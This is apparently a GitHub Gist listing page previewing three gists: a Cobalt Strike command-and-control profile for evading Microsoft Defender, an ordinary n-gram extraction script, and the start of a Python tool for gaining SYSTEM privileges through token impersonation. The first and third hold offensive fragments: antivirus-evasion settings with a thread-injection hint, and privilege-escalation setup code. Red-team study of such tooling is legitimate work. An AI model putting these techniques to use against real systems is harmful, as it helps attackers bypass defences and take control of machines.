tothi
/ minimal-defender-bypass.profile
Last active
April 1, 2025 22:38
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
zapalote
/ extract-gbooks-terms.py
Last active
April 2, 2024 11:31
Example of multi-threading and memory mapped file processing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # extraction pattern: ngram TAB year TAB match_count TAB volume_count NEWLINE | |
| # out: unique_ngram TAB sum(match_count) NEWLINE | |
| import re | |
| import os, sys, mmap | |
| from pathlib import Path | |
| from tqdm import tqdm | |
| from concurrent.futures import ThreadPoolExecutor | |
| abv = re.compile(r'^(([A-Z]\.){1,})(_|[^\w])') # A.B.C. |
skelsec
/ popshellslikeitsasaturday.py
Created
August 7, 2019 17:58
— forked from makelariss/popshellslikeitsasaturday.py
NT AUTHORITY\SYSTEM through Token Impersonation using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| # All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |